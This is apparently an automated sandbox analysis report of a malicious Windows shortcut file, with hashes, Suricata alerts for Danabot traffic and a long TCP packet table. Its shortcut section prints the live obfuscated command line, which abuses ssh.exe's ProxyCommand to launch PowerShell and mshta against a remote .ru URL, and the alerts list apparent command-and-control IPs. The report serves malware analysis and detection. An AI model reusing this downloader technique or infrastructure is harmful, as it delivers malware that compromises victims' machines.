                                                        SHA256:ac09a4ccc5885bd8cd9382802014f6a8eacf7ff53d50b88cc6a8a43b1732a5d3
                                                        SHA512:edd34f725b2c763c03d925b7eb667993e77207013bd221c99ad277bfbc2a80d1f41ae26d41e512b195f4726efbcfc5d5c87e50fa81ea0ac4379a1ce3647cbc5a
                                                        SSDEEP:24:8lj/BF//Z/Uxp+/+G+WbUkVbZEIFPdd79dsHdUM:81LZ0RG+aUk/7ldJ9NM
                                                        TLSH:DD5123042BE93221F3B3AE7584BEB621843F7C46DE755A1F008C42481727614E475F67
                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                        File Icon

                                                        Icon Hash:72d282828e8d8dd5

                                                        Static Windows Shortcut Info

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                        Command Line Argument: -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-27T08:47:51.466422+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049741150.241.97.10443TCP
                                                        2024-12-27T08:49:04.226160+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049921188.132.183.159443TCP
                                                        2024-12-27T08:49:05.724839+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049923206.206.125.221443TCP
                                                        2024-12-27T08:49:06.820784+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.104992894.131.118.216443TCP
                                                        2024-12-27T08:49:07.914994+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049930188.132.183.159443TCP
                                                        2024-12-27T08:49:15.920356+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049954188.132.183.159443TCP
                                                        2024-12-27T08:49:17.921127+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049958206.206.125.221443TCP
                                                        2024-12-27T08:49:19.059297+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.104996194.131.118.216443TCP
                                                        2024-12-27T08:49:20.528519+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049967188.132.183.159443TCP
                                                        2024-12-27T08:49:26.108959+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049983188.132.183.159443TCP
                                                        2024-12-27T08:49:26.209320+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049984206.206.125.221443TCP
                                                        2024-12-27T08:49:26.353449+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.104998594.131.118.216443TCP
                                                        2024-12-27T08:49:26.478397+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1049987188.132.183.159443TCP
                                                        2024-12-27T08:49:37.474876+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050015188.132.183.159443TCP
                                                        2024-12-27T08:49:39.467654+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050021206.206.125.221443TCP
                                                        2024-12-27T08:49:41.358375+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105002794.131.118.216443TCP
                                                        2024-12-27T08:49:43.365644+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050029188.132.183.159443TCP
                                                        2024-12-27T08:49:46.900369+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050034188.132.183.159443TCP
                                                        2024-12-27T08:49:49.605669+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050035206.206.125.221443TCP
                                                        2024-12-27T08:49:51.490399+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105003694.131.118.216443TCP
                                                        2024-12-27T08:49:53.852487+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050037188.132.183.159443TCP
                                                        2024-12-27T08:50:05.277636+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050042188.132.183.159443TCP
                                                        2024-12-27T08:50:05.898036+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050043206.206.125.221443TCP
                                                        2024-12-27T08:50:06.002098+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105004494.131.118.216443TCP
                                                        2024-12-27T08:50:06.102406+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050045188.132.183.159443TCP
                                                        2024-12-27T08:50:18.932612+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050050188.132.183.159443TCP
                                                        2024-12-27T08:50:21.712694+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050051206.206.125.221443TCP
                                                        2024-12-27T08:50:24.018424+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105005294.131.118.216443TCP
                                                        2024-12-27T08:50:26.181397+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050053188.132.183.159443TCP
                                                        2024-12-27T08:50:30.753848+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050058188.132.183.159443TCP
                                                        2024-12-27T08:50:33.064608+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050059206.206.125.221443TCP
                                                        2024-12-27T08:50:36.378759+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105006094.131.118.216443TCP
                                                        2024-12-27T08:50:38.641377+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050061188.132.183.159443TCP
                                                        2024-12-27T08:50:51.338961+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050066188.132.183.159443TCP
                                                        2024-12-27T08:50:51.414710+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050067206.206.125.221443TCP
                                                        2024-12-27T08:50:51.497493+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105006894.131.118.216443TCP
                                                        2024-12-27T08:50:51.571723+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050069188.132.183.159443TCP
                                                        2024-12-27T08:51:07.506464+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050074188.132.183.159443TCP
                                                        2024-12-27T08:51:10.128528+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050075206.206.125.221443TCP
                                                        2024-12-27T08:51:12.766473+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105007694.131.118.216443TCP
                                                        2024-12-27T08:51:14.910033+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050077188.132.183.159443TCP
                                                        2024-12-27T08:51:18.894398+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050082188.132.183.159443TCP
                                                        2024-12-27T08:51:22.212063+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050083206.206.125.221443TCP
                                                        2024-12-27T08:51:25.278106+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105008494.131.118.216443TCP
                                                        2024-12-27T08:51:28.352672+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050085188.132.183.159443TCP
                                                        2024-12-27T08:51:49.222393+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050090188.132.183.159443TCP
                                                        2024-12-27T08:51:49.274931+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050091206.206.125.221443TCP
                                                        2024-12-27T08:51:49.324518+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.105009294.131.118.216443TCP
                                                        2024-12-27T08:51:49.380085+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.1050093188.132.183.159443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 08:47:37.558720112 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:37.558758974 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:37.558929920 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:37.572766066 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:37.572797060 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.115653992 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.115750074 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.170898914 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.170933008 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.171289921 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.171363115 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.173038960 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.219336987 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.699831963 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.699856997 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.699904919 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.699917078 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.699945927 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.699985981 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.796442032 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.796540976 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.902971029 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.903059959 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.927944899 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.928021908 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.952116013 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.952193975 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:39.990873098 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:39.990953922 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.099899054 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.099994898 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.117518902 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.117597103 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.131398916 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.131468058 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.144903898 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.144970894 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.162657022 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.162735939 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.176012039 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.176094055 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.189491987 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.189584017 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.219443083 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.219512939 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.309602022 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.309683084 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.319989920 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.320059061 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.328867912 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.328937054 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.340529919 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.340610027 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.348248005 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.348320007 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.353261948 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.353363991 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.359877110 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.359935045 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.364972115 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.365034103 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.370106936 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.370179892 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.378231049 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.378320932 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.383407116 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.383470058 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.390053034 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.390115023 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.413717985 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.413841009 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.518649101 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.518738985 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.523641109 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.523725033 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.527973890 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.528048038 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.532407999 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.532474995 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.536762953 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.536844015 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.542537928 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.542609930 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.546987057 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.547051907 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.551361084 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.551440954 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.557218075 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.557287931 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.561482906 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.561552048 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.565979958 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.566051006 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.570338011 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.570416927 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.588615894 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.588694096 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.594048977 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.594122887 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.598448992 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.598517895 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.623394012 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.623469114 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.729372978 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.729466915 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.734437943 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.734507084 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.738354921 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.738424063 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.742528915 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.742610931 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.746267080 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.746342897 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.751404047 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.751471043 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.755337954 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.755439997 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.759321928 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.759388924 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.764436007 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.764523029 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.768377066 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.768469095 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.772331953 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.772437096 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.777206898 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.777271986 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.798554897 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.798643112 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.801723003 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.801784992 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.806826115 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.806906939 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.832850933 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.832961082 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.939780951 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.939909935 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.942773104 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.943072081 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.946490049 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.946571112 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.947652102 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.947738886 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.948170900 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.950318098 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.950346947 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:44.644936085 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.644980907 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:44.645066023 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.655927896 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:44.655956030 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.111684084 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.111788034 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.113604069 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.113624096 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.114001036 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.121391058 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.163328886 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673475981 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673532009 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.673619986 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.673638105 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.728364944 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.771799088 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.771815062 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.771893978 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.874396086 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.874418974 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.874500036 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.894160986 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.894172907 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.894315958 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.918626070 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.918749094 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:46.972937107 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:46.973059893 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.061558962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.061666965 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.078490973 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.078578949 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.091078043 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.091173887 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.103660107 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.103765011 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.115972996 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.116072893 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.125252962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.125374079 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.134522915 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.134648085 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.184537888 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.184619904 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.262042046 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.262130976 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.271907091 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.272016048 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.279247999 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.279335022 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.286583900 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.286672115 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.296484947 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.296596050 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.303865910 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.304012060 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.309823990 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.309907913 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.315021038 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.315107107 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.321840048 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.321912050 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.344552994 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.344731092 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.351346970 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.351444960 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.393831015 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.393965006 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.399102926 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.399204969 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.518332958 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.518435001 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.522013903 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.522105932 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.525815010 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.525937080 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.529437065 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.529515028 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.534233093 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.534354925 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.537966967 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.538103104 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.541745901 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.541825056 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.546478033 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.546554089 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.550234079 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.550340891 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.554341078 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.554440022 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.558013916 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.558104038 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.561769962 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.561876059 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.596026897 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.596126080 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.599750996 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.599826097 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.613951921 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.614109039 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.618840933 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.618984938 CET49728443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:47.720335007 CET44349728150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:47.720428944 CET49728443192.168.2.10150.241.97.10
